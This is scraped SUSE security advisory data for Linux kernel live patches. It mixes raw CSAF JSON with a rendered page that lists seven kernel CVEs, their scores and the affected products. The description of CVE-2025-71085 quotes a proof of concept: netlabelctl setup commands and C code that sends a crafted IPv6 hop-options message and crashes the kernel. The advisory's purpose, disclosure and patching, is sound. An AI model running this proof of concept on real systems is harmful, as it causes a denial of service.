],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:04:40Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = 
cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:04:40Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1099-1
Vulnerability from csaf_suse - Published: 2026-03-27 04:33 - Updated: 2026-03-27 04:33
Summary
Security update for the Linux Kernel (Live Patch 5 for SUSE Linux Enterprise 15 SP7)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 5 for SUSE Linux Enterprise 15 SP7)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.19 fixes various security issues
The following security issues were fixed:
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1097,SUSE-2026-1099,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1097,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1104
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
7.8 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
7.3 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
7.5 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
7.5 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
References
39 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 5 for SUSE Linux Enterprise 15 SP7)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.19 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1097,SUSE-2026-1099,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1097,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1104",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1099-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1099-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261099-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1099-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025013.html"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255895",
"url": "https://bugzilla.suse.com/1255895"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257669",
"url": "https://bugzilla.suse.com/1257669"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 5 for SUSE Linux Enterprise 15 SP7)",
"tracking": {
"current_release_date": "2026-03-27T04:33:50Z",
"generator": {
"date": "2026-03-27T04:33:50Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1099-1",
"initial_release_date": "2026-03-27T04:33:50Z",
"revision_history": [
{
"date": "2026-03-27T04:33:50Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_73-default-4-150600.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
